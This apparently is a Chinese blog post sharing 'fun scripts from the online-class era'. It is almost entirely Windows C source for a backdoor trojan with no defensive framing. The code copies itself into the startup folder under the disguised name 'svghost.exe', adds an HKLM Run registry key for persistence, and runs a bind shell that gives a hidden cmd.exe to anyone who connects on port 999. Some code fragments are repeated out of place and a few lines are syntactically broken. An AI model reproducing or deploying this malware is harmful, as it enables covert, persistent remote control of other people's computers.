翻出那些网课时期诞生的奇妙脚本!
#include<windows.h>
#include<stdio.h>
int main(void){
char FileName[MAX_PATH];//存储程序自身的绝对路径
char TempPath[MAX_PATH];//存储系统存放路径,主要获取系统盘盘符
char TempBuffer[MAX_PATH];
GetModuleFileName(NULL,FileName,sizeof(FileName));
GetSystemDirectory(TempPath,sizeof(TempPath));
sprintf(TempBuffer,"%c%c\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\torjan.exe",TempPath[0],TempPath[1]);
CopyFile(FileName,TempBuffer,TRUE); //将程序复制到启动文件夹中
return 0;
}
GetPrivateProfileStringA("Main", "KeyName", "kinni", key_name, sizeof(key_name), ".\\config.ini");
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));
#pragma comment(lib,"ws2_32.lib")
//设置连接器选项
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#include <winsock2.h>
#include<windows.h>
#include<stdio.h>
#define MasterPort 999 //定义监听端口
void open_telnet(){
WSADATA WSADa;//用来存储被WSAStartup函数调用后返回的win sockets数据
sockaddr_in SockAddrin;
SOCKET CSocket, SSocket;
int AddrSize;
PROCESS_INFORMATION Processinfo;
STARTUPINFO Startupinfo;
char szCMDPath[255];
/配内存资源,初始化数据
ZeroMemory(&Processinfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&Startupinfo, sizeof(STARTUPINFO));
ZeroMemory(&WSADa, sizeof(WSADATA));
//获取CMD路径
GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x202, &WSADa);
//设置本地信息和绑定协议,建立socket
SockAddrin.sin_family = AF_INET;
SockAddrin.sin_addr.s_addr = INADDR_ANY;
SockAddrin.sin_port = htons(MasterPort);
CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
//设置绑定断端口999
bind(CSocket, (sockaddr*)&SockAddrin, sizeof(SockAddrin));
//设置服务器监听端口
listen(CSocket, 1);
AddrSize = sizeof(SockAddrin);
//开始连接远程服务器,并配置隐藏窗口结构体
SSocket = accept(CSocket, (sockaddr*)&SockAddrin, &AddrSize);
Startupinfo.cb = sizeof(STARTUPINFO);
Startupinfo.wShowWindow = SW_HIDE;
Startupinfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
Startupinfo.hStdInput = (HANDLE)SSocket;
Startupinfo.hStdOutput = (HANDLE)SSocket;
Startupinfo.hStdError = (HANDLE)SSocket;
//创建匿名管道
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &Startupinfo, &Processinfo);
WaitForSingleObject(Processinfo.hProcess, INFINITE);
CloseHandle(Processinfo.hProcess);
CloseHandle(Processinfo.hThread);
//关闭进程句柄
closesocket(CSocket);
closesocket(SSocket);
WSACleanup();
//关闭连接卸载ws2_32.dll
}
int regedit(HKEY key, const char* reg_name, const char* key_name, const char* key_value)
{
HKEY hkResult;
int ret=RegOpenKeyEx(key, reg_name, 0, KEY_ALL_ACCESS, &hkResult);
if(ret != 0)
return ret;
ret=RegSetValueEx(hkResult, key_name, 0, REG_EXPAND_SZ, (CONST BYTE*)key_value, 75);
if(ret==0)
{
RegCloseKey(hkResult);
return 0;
}
else
{
return ret;
}
}
int autopen(const char* key_name, const char* process_path)
{
char reg_name[] = “Software\Microsoft\Windows\CurrentVersion\Run”;
return regedit(HKEY_LOCAL_MACHINE, reg_name, key_name, process_path);
}
int main(void)
{
char key_name[100];
char process_path[1024];
///写入启动文件夹
char FileName[MAX_PATH];//存储程序自身的绝对路径
char TempPath[MAX_PATH];//存储系统存放路径,主要获取系统盘盘符
char TempBuffer[MAX_PATH];
GetModuleFileName(NULL,FileName,sizeof(FileName));
GetSystemDirectory(TempPath,sizeof(TempPath));
sprintf(TempBuffer,"%c%c\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\svghost.exe",TempPath[0],TempPath[1]);
CopyFile(FileName,TempBuffer,TRUE); //将程序复制到启动文件夹中
///写入注册表///
GetPrivateProfileStringA("Main", "KeyName", "kinni", key_name, sizeof(key_name), ".\\config.ini");
GetPrivateProfileStringA("Main", "ProcessPath", "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\svghost.exe", process_path, sizeof(process_path), ".\\config.ini");
int ret = autopen(key_name, process_path);
open_telnet();//远程telnet
return 0;
}
